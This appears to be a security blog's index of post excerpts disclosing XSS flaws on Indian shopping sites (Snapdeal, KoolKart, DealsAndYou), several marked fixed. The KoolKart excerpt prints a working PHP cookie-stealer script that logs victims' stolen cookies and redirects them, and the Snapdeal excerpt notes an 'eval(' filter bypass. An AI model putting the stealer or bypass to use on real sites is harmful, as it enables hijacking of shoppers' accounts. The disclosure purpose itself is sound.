Hey Snapdeal – You’ve got a XSS vulnerability [Fixed]


Update: Got a mail from snapdeal security team, and this vulnerability has been fixed.
I just found a XSS vulnerability on a very popular Indian e-commerce site snapdeal.com. It was a bit tricky to find the XSS pattern, because searching for a string containing some  javascript functions such as “alert(” or “String.fromCharCode(“, were throwing “Access Denied” page. Though, the search string containing “eval(” wasn’t throwing any error.


Snapdeal XSS Access-Denied

Continue reading

Popular (and not so popular) Indian E-commerce websites with XSS vulnerabilities


I was going though few Indian e-commerce websites and found XSS vulnerabilities in few of them. I’m not publishing injection patterns due to security reasons. If anyone from the companies listed below want to know the injection pattern for their respective websites, get in touch. Below is the list of websites which are vulnerable:

Find the screenshots for all the sites listed above (click to enlarge) : Continue reading

KoolKart.com, get Kooler by sanitizing your input


Earlier, I demonstrated the XSS vulnerability in DealsAndYou (fixed) and now, I’ll demo a XSS bug on KoolKart.com. I’ll describe the whole process below.

Step 1 – Writing a php script for saving cookie returned by injected code (cookie-stealer.php).

$str = trim($_REQUEST['cookie']);
$file = 'cookie.txt';
    $current = file_get_contents($file);
    $current .= date('Y-m-d H:i:s') . "\t\t" . $str . "\n\n\n";
    file_put_contents($file, $current);
    header('Location: http://www.koolkart.com/');

The code is self explanatory. It gets the cookie information via querystring, saves it to a text file and redirects back to koolkart. Continue reading

DealsAndYou, why you no sanitize inputs?

Dealsandyou.com, Y U NO sanitize input

Dealsandyou.com, Y U NO sanitize input

Update: Dealsandyou has fixed the bug. Responded on twitter with a thanks.

Click to see full-size image.


I was looking at dealsandyou.com a couple of days back and something (may be their bad design) made me do a XSS vulnerability test on their “Search” input box using the XSS Locator code snippet. Voila!, an alert box popped up confirming my hunch. Continue reading